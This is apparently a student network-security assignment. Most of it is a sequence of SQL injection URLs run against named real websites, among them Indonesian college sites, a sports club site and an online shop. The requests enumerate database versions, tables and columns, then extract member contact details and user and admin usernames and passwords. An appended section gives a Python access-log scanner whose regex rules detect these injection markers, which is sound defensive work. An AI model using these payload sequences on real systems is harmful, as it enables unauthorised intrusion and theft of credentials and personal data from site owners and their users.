ASSIGNMENT
Prepared to fulfil the final semester examination (UAS) for the Network Security course
in Semester 5 of the Informatics Engineering department
By:
Everything located between <FORM> and </FORM> can potentially be used to explore
the web page, because it can become a parameter. The page above will send a
parameter named "login" with the value "andi".
http://www.google.co.id/url?sa=t&source=web&ct=res&cd=3&ved=0CBAQFjAC&url=http%3A%2F%2Fp3m.amikom.ac.id%2Fp3m
%2Fdasi%2Fsept04%2F01%2520%2520STMIK%2520AMIKOM%2520Yogyakarta%2520Makalah%2520ANDI%2520_metode
%2520penyerangan_%252010.pdf&rct=j&q=sql+injection+tutorial+filetype
%3Apdf&ei=VoWCS6vmDsGLkAXGg_HGCA&usg=AFQjCNEAjJ9PcHmys_0vytsC4GvTioPKRA
http://www.akbid-alhikmah-jpr.ac.id/news.php?id=1%20UNION%20SELECT%201,2,3,4,5,6
http://www.akbid-alhikmah-jpr.ac.id/news.php?id=1%20UNION%20SELECT%201,@@version,3,4,5,6
http://www.akbid-alhikmah-jpr.ac.id/news.php?id=-1%20UNION%20SELECT%201,group_concat%28table_name
%29,3,4,5,6%20from%20information_schema.tables%20where%20table_schema=database%28%29--
http://www.akbid-alhikmah-jpr.ac.id/news.php?id=-1%20UNION%20SELECT%201,group_concat%28column_name
%29,3,4,5,6%20from%20information_schema.columns%20where%20table_name=0x6c6f67696e--
(login table)
http://www.akbid-alhikmah-jpr.ac.id/news.php?id=-1%20UNION%20SELECT%201,group_concat%28column_name
%29,3,4,5,6%20from%20information_schema.columns%20where%20table_name=0x6d656d626572--
(member table)
http://www.akbid-alhikmah-jpr.ac.id/news.php?id=-1%20UNION%20SELECT%201,group_concat
%28nama,0x3a,alamat,0x3a,telp,0x3a,email%29,3,4,5,6%20from%20member--
http://www.stmikpontianak.ac.id/
http://www.stmikpontianak.ac.id/news.php?id=-24%20%20UNION%20SELECT%201,2,3,4,5,6,7,8,9%20--
http://www.stmikpontianak.ac.id/news.php?id=-24%20%20UNION%20SELECT%201,2,@@version,4,5,6,7,8,9%20--
http://kaestu.akbideub.ac.id/
http://kaestu.akbideub.ac.id/admin/berita.php?id=7%27
http://kaestu.akbideub.ac.id/admin/berita.php?id=-7%20order%20by%205--
http://kaestu.akbideub.ac.id/admin/berita.php?id=-7%20UNION%20SELECT%201,2,3,4,5
http://kaestu.akbideub.ac.id/admin/berita.php?id=-7%20UNION%20SELECT%201,@@version,3,4,5
http://kaestu.akbideub.ac.id/admin/berita.php?id=-7%20UNION%20SELECT%201,group_concat%28table_name
%29,3,4,5%20from%20information_schema.tables%20where%20table_schema=database%28%29--
http://kaestu.akbideub.ac.id/admin/berita.php?id=-7%20UNION%20SELECT%201,group_concat%28column_name
%29,3,4,5%20from%20information_schema.columns%20where%20table_name=0x75736572--
(user table)
http://kaestu.akbideub.ac.id/admin/berita.php?id=-7%20UNION%20SELECT%201,group_concat
%28username,0x3a,password,0x3a,email,0x3a,admin,0x3a,status%29,3,4,5%20from%20user--
http://www.worcestercountywildcats.com/
http://www.worcestercountywildcats.com/news.php?id=85%27
http://www.worcestercountywildcats.com/news.php?id=-85%20order%20%20by%2012--
http://www.worcestercountywildcats.com/news.php?id=-85%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12
http://www.worcestercountywildcats.com/news.php?id=-85%20UNION%20SELECT
%201,2,3,4,5,6,7,8,@@version,10,11,12
http://www.worcestercountywildcats.com/news.php?id=-85%20UNION%20SELECT%201,2,3,4,5,6,7,8,group_concat
%28table_name%29,10,11,12%20from%20information_schema.tables%20where%20table_schema=database%28%29--
http://www.worcestercountywildcats.com/news.php?id=-85%20UNION%20SELECT%201,2,3,4,5,6,7,8,group_concat
%28column_name%29,10,11,12%20from%20information_schema.columns%20where
%20table_name=0x73796d706f6c6c5f61757468--
http://www.worcestercountywildcats.com/news.php?id=-85%20UNION%20SELECT%201,2,3,4,5,6,7,8,group_concat
%28user,0x3a,pass%29,10,11,12%20from%20sympoll_auth--
http://www.shopaholic.us.com
http://www.shopaholic.us.com/themes/main/news.php?type=detail&id=-25%20UNION%20SELECT%201,2,3,4,5,6,7,8,9
http://www.shopaholic.us.com/themes/main/news.php?type=detail&id=-25%20UNION%20SELECT
%201,@@version,3,4,5,6,7,8,9
http://www.shopaholic.us.com/themes/main/news.php?type=detail&id=-25%20UNION%20SELECT%201,group_concat
%28table_name%29,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database
%28%29--
http://www.shopaholic.us.com/themes/main/news.php?type=detail&id=-25%20UNION%20SELECT%201,group_concat
%28column_name%29,3,4,5,6,7,8,9%20from%20information_schema.columns%20where
%20table_name=0x6163636f756e74--
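The requests listed above share a small set of markers in the `id` parameter: a trailing quote, `order by N`, `UNION SELECT`, `@@version`, `group_concat(`, `information_schema`, hex-literal table names and a trailing `--`. The following is an added example, not part of the original assignment, that flags those markers per parameter in web-server access logs; the rule names, the log format (combined log format) and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Markers drawn from the request patterns listed on this page.
RULES = {
    "quote_probe": re.compile(r"^-?\d+'$"),                  # id=7%27
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "version_probe": re.compile(r"@@version", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{4,}\b", re.I),  # table_name=0x...
    "sql_comment": re.compile(r"--\s*$"),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode(value, rounds=2):
    """Percent-decode again so double-encoded input (%2520) is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return {parameter: [matched rule names]} for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return {}
    hits = {}
    # parse_qsl performs the first round of percent-decoding itself.
    for name, raw in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        matched = sorted(r for r, rx in RULES.items() if rx.search(decode(raw)))
        if matched:
            hits[name] = matched
    return hits

# Constructed log lines (documentation IP range, made-up paths and sizes).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /news.php?id=12&q=order+by+date HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /news.php?id=12%27 HTTP/1.1" 500 312',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /news.php?id=-12%20order%20by%206-- HTTP/1.1" 200 4980',
    '203.0.113.7 - - [01/Jan/2024:10:00:14 +0000] "GET /news.php?id=-12%20UNION%20SELECT%201,group_concat%28column_name%29,3%20from%20information_schema.columns%20where%20table_name=0x6c6f67696e-- HTTP/1.1" 200 5201',
    '203.0.113.7 - - [01/Jan/2024:10:00:20 +0000] "GET /news.php?type=detail&id=-25%2520UNION%2520SELECT%25201,@@version,3 HTTP/1.1" 200 5033',
]

if __name__ == "__main__":
    for n, line in enumerate(SAMPLE_LOG, 1):
        print(n, scan_line(line) or "clean")
```

A rule hit is a triage signal, not proof of compromise; the fix on the application side remains binding `id` as a typed parameter in a prepared statement.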